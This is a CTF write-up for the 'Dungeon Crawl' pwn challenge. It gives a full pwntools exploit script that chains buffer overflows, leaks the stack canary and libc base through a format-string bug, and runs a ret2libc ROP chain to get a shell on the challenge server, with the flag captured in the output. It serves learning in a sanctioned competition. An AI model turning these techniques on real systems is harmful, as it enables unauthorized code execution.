## === Dungeon Crawl (Pwn: 49 solves / 490 pts) ===

I confirmed 100 actions one by one at level 4.
Segmentation fault occurred at the 73rd action.

```
ubuntu:~/Pwn_Dungeon_Crawl$ ./level4
----- LEVEL 4 -----
Choose an action: 73
Hey traveler, what is your name? 1
Running action 73...
Segmentation fault (core dumped)
```

In level 5, I read the canary value by FSB.
In the same way, I read the function address of GOT and got the base address of libc.
```
ubuntu:~/Pwn_Dungeon_Crawl$ ./level5
----- LEVEL 5 -----
This is your final task - defeat this level and you will be rewarded.
Choose your path to victory...

Choice [0 exit][1 small][2 large][3 format]: 3
Path 3 - The possibilities are endless!
%71$p
0xfa6856f27f8d8d00
Still alive?
```

```
from pwn import *

#context(os='linux', arch='i386')
#context.log_level = 'debug'

BINARY = './level1'

if len(sys.argv) > 1 and sys.argv[1] == 'r':
s = remote("chal1.swampctf.com", 1337)
libc = ELF('./libc.so.6')
else:
s = process(BINARY)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

#
# level1
#
s.recvuntil("Access token please: ")
s.sendline("252534")

#
# level2
#
s.recvuntil("What is your party name? ")
s.sendline("A"*124+p32(0xCC07C9))

#
# level3
#
s.recvuntil("what is your favorite spell? ")
s.sendline("A"*136+"-")

#
# level4
#
s.recvuntil("Choose an action: ")
s.sendline("73")

s.recvuntil("what is your name? ")
s.sendline("A"*108+p32(0x804a47c))

#
# level5
#

elf = ELF('./level5')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
pop_rdi_ret_addr = 0x400b73 # pop rdi ; ret ; (1 found)

puts_offset_addr = libc.symbols['puts']
system_offset_addr = libc.symbols['system']
binsh_offset_addr = next(libc.search('/bin/sh'))

s.recvuntil("[3 format]: ")
s.sendline("3")

s.recvuntil("endless!\n")
s.sendline("%71$p")
r = s.recv(18)
canary = int(r[2:], 16)
print "canary =", hex(canary)

s.recvuntil("[3 format]: ")
s.sendline("3")

s.recvuntil("endless!\n")
s.sendline("%7$sAAAA" + p64(puts_got_addr))
r = s.recv(6)
puts_addr = u64(r[0:6] + "\x00\x00")
libc_base_addr = puts_addr - puts_offset_addr
system_addr = libc_base_addr + system_offset_addr
binsh_addr = libc_base_addr + binsh_offset_addr
print "puts_addr =", hex(puts_addr)
print "libc_base_addr =", hex(libc_base_addr)
print "system_addr =", hex(system_addr)
print "binsh_addr =", hex(binsh_addr)

s.recvuntil("[3 format]: ")
s.sendline("1")
s.recvuntil("challenge :)\n")
buf = "A"*0x18
buf += p64(canary)
buf += "B"*8
buf += p64(pop_rdi_ret_addr)
buf += p64(binsh_addr)
buf += p64(system_addr)
s.sendline(buf)

s.interactive()
```

```
ubuntu:~/Pwn_Dungeon_Crawl$ python exploit.py r
[+] Opening connection to chal1.swampctf.com on port 1337: Done
[*] '/Pwn_Dungeon_Crawl/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] '/Pwn_Dungeon_Crawl/level5'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
canary = 0x10867b61bc595400
puts_addr = 0x7ff90414f690
libc_base_addr = 0x7ff9040e0000
system_addr = 0x7ff904125390
binsh_addr = 0x7ff90426cd57
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
flag
level1
level2
level3
level4
level5
$ cat flag
flag{I_SurV1v3d_th3_f1n4l_b0ss}
```